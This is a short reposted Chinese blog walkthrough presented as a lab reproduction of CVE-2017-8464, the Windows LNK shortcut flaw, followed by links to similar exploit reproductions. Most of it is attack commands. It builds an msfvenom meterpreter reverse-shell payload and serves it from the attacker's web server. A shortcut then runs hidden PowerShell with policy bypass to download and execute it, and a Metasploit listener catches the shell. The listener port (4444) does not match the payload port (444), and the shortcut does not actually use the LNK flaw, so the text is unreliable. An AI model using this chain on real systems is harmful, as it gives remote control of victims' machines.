CVE-2017-8464復現（遠程快捷方式漏洞）

本文轉載自查看原文 2017-06-18 11:20 3096

我們的攻擊機IP是192.168.222.133　　

目標機IP是192.168.222.132

我們首先生成一個powershell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.133 LPORT=444 -f psh-reflection>1.ps1

把生成的1.ps1 copy到/var/www/html cp /root/1.ps1 /var/www/html

service apache2 start 然后我們訪問127.0.0.1/1.ps1 是可以訪問的

我們在目標機創建快捷方式powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.222.133/1.ps1');test.ps1"

然后訪問

創建監聽，然后連接meterpreter

msfconsole

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.222.133

set LPORT 4444

exploit

復現成功

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CVE-2017-8464遠程命令執行漏洞（震網漏洞）復現 [CVE-2017-8464]Microsoft Windows遠程命令執行漏洞復現【漏洞公告】CVE-2017-8464 :Microsoft Windows LNK 遠程代碼執行漏洞 Samba遠程代碼執行漏洞(CVE-2017-7494)復現 Supervisord遠程命令執行漏洞（CVE-2017-11610）復現 CVE-2017-7269-iis遠程溢出漏洞復現漏洞復現-CVE-2017-7525-Jackson遠程代碼執行 Tomcat遠程代碼執行漏洞CVE-2017-12615復現 Office遠程代碼執行漏洞CVE-2017-0199復現 Samba遠程代碼執行漏洞(CVE-2017-7494)復現